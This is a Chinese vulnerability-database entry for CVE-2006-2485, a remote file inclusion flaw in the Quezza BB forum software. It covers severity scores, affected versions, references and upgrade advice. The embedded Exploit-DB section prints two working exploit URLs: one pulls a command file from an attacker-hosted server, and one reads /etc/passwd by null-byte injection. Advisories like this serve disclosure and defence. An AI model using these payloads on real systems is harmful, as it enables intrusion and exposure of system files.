CVE-2006-2485
CVSS7.5
发布时间 :2006-05-19 19:02:00
修订时间 :2011-03-07 21:36:17
NMCOE    

[原文]PHP remote file inclusion vulnerability in includes/class_template.php in Quezza 1.0 and earlier, and possibly 1.1.0 allows remote attackers to execute arbitrary PHP code via a URL in the quezza_root_path parameter.


[CNNVD]Quezza BB class_template.php 远程文件包含漏洞(CNNVD-200605-362)

        Quezza BB是一款基于phpBB的Web论坛系统。
        Quezza BB处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        Quezza BB的class_template.php脚本没有正确验证quezza_root_path参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:quezza:quezza_bb:1.1.0
cpe:/a:quezza:quezza_bb:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2485
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2485
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-362
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/20120
(VENDOR_ADVISORY)  SECUNIA  20120
http://www.vupen.com/english/advisories/2006/1837
(UNKNOWN)  VUPEN  ADV-2006-1837
http://www.securityfocus.com/bid/18011
(UNKNOWN)  BID  18011
http://www.securityfocus.com/archive/1/archive/1/434231/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060517 Advisory: Quezza BB <= 1.0 File Inclusion Vulnerability.
http://xforce.iss.net/xforce/xfdb/26489
(UNKNOWN)  XF  quezzabb-classtemplate-file-include(26489)
http://www.osvdb.org/25562
(UNKNOWN)  OSVDB  25562
http://www.nukedx.com/?getxpl=30
(UNKNOWN)  MISC  http://www.nukedx.com/?getxpl=30
http://securityreason.com/securityalert/924
(UNKNOWN)  SREASON  924
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0396.html
(UNKNOWN)  FULLDISC  20060516 Advisory: Quezza BB <= 1.0 File Inclusion Vulnerability.

- 漏洞信息

Quezza BB class_template.php 远程文件包含漏洞
高危 输入验证
2006-05-19 00:00:00 2006-05-22 00:00:00
远程  
        Quezza BB是一款基于phpBB的Web论坛系统。
        Quezza BB处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        Quezza BB的class_template.php脚本没有正确验证quezza_root_path参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.quezza.com/

- 漏洞信息 (1798)

Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability (EDBID:1798)
php webapps
2006-05-17 Verified
0 nukedx
N/A [点击下载]
Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on Quezza BB <= 1.0
Original advisory can be found at: http://www.nukedx.com/?viewdoc=30
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00
Succesful exploitation register_globals on for both examples.
# nukedx.com [2006-04-21]

# milw0rm.com [2006-05-17]
		

- 漏洞信息

25562
Quezza class_template.php quezza_root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Quezza contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to class_template.php not properly sanitizing user input supplied to the "quezza_root_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-16 Unknow
2006-05-16 Unknow

- 解决方案

Upgrade to version 1.2.0 or higher, as it has been reported to fix this vulnerability. In addition, The Quezza Dev Team has released a patch for some older versions.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站